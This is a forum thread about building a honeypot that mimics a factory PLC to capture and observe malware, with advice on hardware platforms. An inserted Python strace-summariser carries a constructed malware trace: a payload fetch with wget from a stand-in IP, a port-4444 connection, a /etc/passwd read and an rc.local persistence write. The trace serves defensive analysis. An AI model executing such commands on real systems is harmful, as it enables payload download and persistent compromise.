Help creating a Honeypot for an AVR architecture


I'm taking a class that is composed mostly of master's students in computer security. The grade is based on a group project and my group is composed of four computer science students.

We were tasked with creating a honeypot for an AVR32 architecture. The goal is not only to capture the malware but also to see what it does to the system.

The only solution we could think of was finding a Linux distro and altering it, so the syscalls are somewhat transparent and we can understand what the malware does. I did some research and Buildroot seems to be the way to go, as it's somewhat simple, flexible and has a lot of sources on the web (especially AVR related).

Do you guys have any input to give me? Is this a good idea, or are there other options that I'm not seeing?

Any tips about what to study are pretty welcome.

Last Edited: Thu. Apr 26, 2018 - 09:56 PM

Hello!

Look at the ARM devices as the 32U devices are not a popular choice.

There are others here far better qualified than I to advise you on the other parts of your question, so I will leave that to them.

Jim

I would rather attempt something great and fail, than attempt nothing and succeed - Fortune Cookie

 

"The critical shortage here is not stuff, but time." - Johan Ekdahl

 

"Step N is required before you can do step N+1!" - ka7ehk

 

"If you want a career with a known path - become an undertaker. Dead people don't sue!" - Kartman

"Why is there a "Highway to Hell" and only a "Stairway to Heaven"? A prediction of the expected traffic load?"  - Lee "theusch"

 

Speak sweetly. It makes your words easier to digest when at a later date you have to eat them ;-)  - Source Unknown

Please Read: Code-of-Conduct

Atmel Studio6.2/AS7, DipTrace, Quartus, MPLAB, RSLogix user


lucaslo wrote:
AVR32 architecture ... Linux distro

See: https://www.avrfreaks.net/forum/avr32-support-dropped-linux-kernel

Can't imagine there's anyone putting much effort into malware for such obscure systems ... ?

Top Tips:

  1. How to properly post source code - see: https://www.avrfreaks.net/comment... - also how to properly include images/pictures
  2. "Garbage" characters on a serial terminal are (almost?) invariably due to wrong baud rate - see: https://learn.sparkfun.com/tutorials/serial-communication
  3. Wrong baud rate is usually due to not running at the speed you thought; check by blinking a LED to see if you get the speed you expected
  4. Difference between a crystal, and a crystal oscillator: https://www.avrfreaks.net/comment...
  5. When your question is resolved, mark the solution: https://www.avrfreaks.net/comment...
  6. Beginner's "Getting Started" tips: https://www.avrfreaks.net/comment...

lucaslo wrote:
I did some research and Buildroot seems to be the way to go, as it's somewhat simple, flexible and has a lot of sources on the web (especially AVR related).
Is OpenWrt based on Buildroot?

FYI, AVR32 is in OpenWrt version 10 (current is 17).

lucaslo wrote:
... or are there other options that I'm not seeing?
Does it have to be AVR32?

Reasons:

  • MIPS routers are ubiquitous
  • SAMA5 may be one Microchip follow-on to AVR32

https://openwrt.org/start?do=search&id=start&q=AT32AP7000

http://www.at91.com/linux4sam/bin/view/Linux4SAM/BuildRoot via http://www.at91.com/linux4sam/bin/view/Linux4SAM/Sama5d27Som1EKMainPage#Demo_archives

 

"Dare to be naïve." - Buckminster Fuller


The AVR32 application processors are well EOL (end of life). As Awneil mentions, most wifi routers are MIPS based, so you can purchase suitable hardware at low cost and put OpenWrt on it. The benefit of OpenWrt is that it has a mature build system (probably Buildroot based) and a lot of prebuilt applications and utilities.

From experience, you don't need to do much apart from having your device on the internet to get hacking attempts. I (stupidly) set up a 3G node as a server. I was attacked by some people from China (or so the IP addresses would indicate). Whilst they didn't gain access, they did manage to chew up a lot of the 3G data I was paying for.


Kartman wrote:
The AVR32 application processors are well EOL (end of life).

As Cliff points out in the thread I linked earlier, the currently-available UC3 are not application processors - so not a basis for Linux:

https://www.avrfreaks.net/commen...

Kartman wrote:
As Awneil mentions, most wifi routers are MIPS based

Actually, that was gchapman.

EDIT: typo


Mea culpa! Must’ve scrolled too fast on the phone.


If one wants to play the "Linux game" then apart from the obvious choice of actually doing it on a PC - running the Linux in a Virtual Machine - is the next most obvious these days not simply to buy a Raspberry Pi and work with that?

 

Why would you choose some obsolete old Atmel for such experiments? If you do want to stick with the Atmel (well Microchip) brand then I'm sure they have Cortex A CPUs and boards - but I bet you find they are considerably more expensive than RPis.


A lot of helpful answers.

I should have clarified a little better what the assignment was. There are no hard lines or a PDF with a specification; the professor just told us that we should make a honeypot for a PLC, and not just capture malware but also see what it does to a system.

It needs to look like it's operating something on a factory floor and it's not a PC.

The professor is always open for dialogue and not at all strict. If I can make my case to him and my group, I'm pretty sure I'm allowed to divert from the original idea.

The AVR32 is the only piece of hardware used in manufacturing that we could get our hands on.

I was open to finding a way to emulate a PLC, but my group partners insist that if we emulate one we would never be able to see what the malware does in real life, just infer it from the code.

gchapman wrote:

Reasons:

  • MIPS routers are ubiquitous
  • SAMA5 may be one Microchip follow-on to AVR32

OpenWrt seems to be great and we do have money for a router, but even if I spend a lot of time making a custom firmware, will it look like a PLC to the malware? I'm familiar with MIPS instructions and some architectures but I have no idea how this intersects with PLCs.

awneil wrote:

lucaslo wrote:
AVR32 architecture ... Linux distro

See: https://www.avrfreaks.net/forum/avr32-support-dropped-linux-kernel

Can't imagine there's anyone putting much effort into malware for such obscure systems ... ?

I've been told many times that anything you put online gets attacked, but I definitely don't want to spend energy and time learning about a technology with no practical use.

clawson wrote:

If one wants to play the "Linux game" then apart from the obvious choice of actually doing it on a PC - running the Linux in a Virtual Machine - is the next most obvious these days not simply to buy a Raspberry Pi and work with that?

Why would you choose some obsolete old Atmel for such experiments? If you do want to stick with the Atmel (well Microchip) brand then I'm sure they have Cortex A CPUs and boards - but I bet you find they are considerably more expensive than RPis.

I believe that a Raspberry Pi is also in our budget.

We are not interested in Linux per se; that was the only way I could think of to see what the malware does, by monitoring the syscalls, and altering a Linux distro seemed like the easiest way to do this.

We really need to focus on hardware used to control manufacturing, as there is already a ton of work being done with PCs in our department.

Thanks everyone

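The syscall-monitoring idea from the original post and again above (watch what a captured sample does rather than infer it from its code) does not actually require altering the distro: record the sample's calls with strace and reduce the log to the actions an analyst cares about. This is an added example, not code from the thread; the trace lines are constructed in strace's `-f -tt` output style, and the paths and the IP address in them are made up.

```python
import re

# Constructed sample in "strace -f -tt" style (pid, timestamp, call); not a real capture.
SAMPLE_TRACE = """\
1042 12:00:01.001 execve("/tmp/.x", ["/tmp/.x"], 0x7ffd) = 0
1042 12:00:01.010 openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3
1042 12:00:01.020 socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 4
1042 12:00:01.030 connect(4, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.5")}, 16) = 0
1042 12:00:01.040 openat(AT_FDCWD, "/etc/rc.local", O_WRONLY|O_APPEND) = 5
1042 12:00:01.050 write(5, "/tmp/.x &", 9) = 9
1042 12:00:01.060 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD) = 1043
1043 12:00:01.070 execve("/bin/sh", ["sh", "-c", "wget http://203.0.113.5/b"], 0x7ffd) = 0
1042 12:00:01.080 openat(AT_FDCWD, "/nonexistent", O_RDONLY) = -1 ENOENT (No such file or directory)
"""

LINE_RE = re.compile(r'^(\d+)\s+\S+\s+(\w+)\((.*)\)\s+=\s+(-?\d+)(.*)$')
QUOTED_RE = re.compile(r'"([^"]*)"')                       # first quoted argument
OPEN_RE = re.compile(r'"([^"]*)",\s*([A-Z_|]+)')            # path followed by O_* flags
CONNECT_RE = re.compile(r'sin_port=htons\((\d+)\).*inet_addr\("([^"]+)"\)')
WRITE_FLAGS = {"O_WRONLY", "O_RDWR"}


def summarise_trace(text):
    """Reduce a syscall trace to executed programs, files touched and outbound connections."""
    out = {"pids": set(), "exec": [], "files_read": [], "files_written": [],
           "connections": [], "failed": 0}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # signal deliveries, exit lines etc. are not syscalls
        pid, call, args, ret = int(m.group(1)), m.group(2), m.group(3), int(m.group(4))
        out["pids"].add(pid)
        if ret < 0:
            out["failed"] += 1  # failed calls still reveal what the sample probed
            continue
        if call in ("execve", "execveat"):
            out["exec"].append(QUOTED_RE.search(args).group(1))
        elif call in ("open", "openat"):
            om = OPEN_RE.search(args)
            if om:
                path, flags = om.group(1), set(om.group(2).split("|"))
                key = "files_written" if flags & WRITE_FLAGS else "files_read"
                out[key].append(path)
        elif call == "connect":
            cm = CONNECT_RE.search(args)
            if cm:
                out["connections"].append((cm.group(2), int(cm.group(1))))
    return out
```

Feeding it the output file of `strace -f -tt -o trace.log <sample>` gives the same summary for a real session; the modified files and outbound connections are what you compare against the pristine honeypot image afterwards.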

If you are particularly focussing on syscalls in Linux then clearly you need some hardware that runs Linux?

If you are thinking more of external attacks on "industrial controllers" I think you first need to specify exactly what you mean by "industrial controller". Sure there may be some high level ones that run Linux but the majority are more likely going to be 8 or 16 bit micros not specifically running an "OS" but some dedicated embedded software tailored to the task. There's not going to be a "standard" security solution for such devices. It's going to completely depend on their external comms channels and how they are handled. Also note that many such devices (and certainly AVR8 based ones) are Harvard not von Neumann, so they don't keep their code in the same memory space as "exploitable" data. So concepts such as over-running buffers to corrupt return stacks and embed additional executable sequences just aren't going to work, because they won't run code out of RAM.

It's going to tend to be "bigger processors" that share DRAM for code and data that can be subject to such exploits.


lucaslo wrote:
I've been told many times that anything you put online gets attacked, but I definitely don't want to spend energy and time learning about a technology with no practical use.

Malware which attacks the system at a shell scripting level could be used to target machines in a CPU-agnostic way. (I'm thinking about vulnerabilities similar to ShellShock, for example.) So one of the old AVR32-based AP7 processors running Linux might be affected by a certain subset of malware even though nobody was deliberately targeting them.

But anyway, it would be difficult for you to get your hands on an AP7-based AVR32 system today. (Although, the outdated state of the Linux kernel and userspace utilities for those devices would make them prime candidates to contain unpatched vulnerabilities.)

I've found evidence of at least one Master's thesis project which claims to have successfully patched the MMU-less variant of Linux to run on an AT32UC3A0512 device with loads of external SRAM, a patched version of GCC (and associated utilities) to produce binaries for such a platform, and a patched version of U-Boot to fire it all up... But now we're talking about the extreme fringes of esoteric platforms, and certainly not a good example of any real-world scenario.


lucaslo wrote:
the professor just told us that we should make a honeypot for a PLC, and not just capture malware but also see what it does to a system.

Then he should have suggested where to find, or provided, the target PLC!

FF = PI > S.E.T


lfmorrison wrote:
[one's master's thesis on UC3A0 uClinux]... But now we're talking about the extreme fringes of esoteric platforms, and certainly not a good example of any real-world scenario.
Cool!

A possible follow-on effort could leverage LiteBSD on PIC32MZ.

Some PIC32MZ boards have an Ethernet PHY, so one could be an Internet honeypot.

But a PIC32MZ for a PLC would more likely run either or both of:

  • an RTOS
  • a WebSocket server (careful design to separate real-time from server-side)

https://github.com/sergev/LiteBSD/wiki (LiteBSD)

https://www.microchip.com/design-centers/32-bit/pic-32-bit-mcus/pic32mz-ef-family

https://realtimelogic.com/products/sharkssl/minnow-server/

"Dare to be naïve." - Buckminster Fuller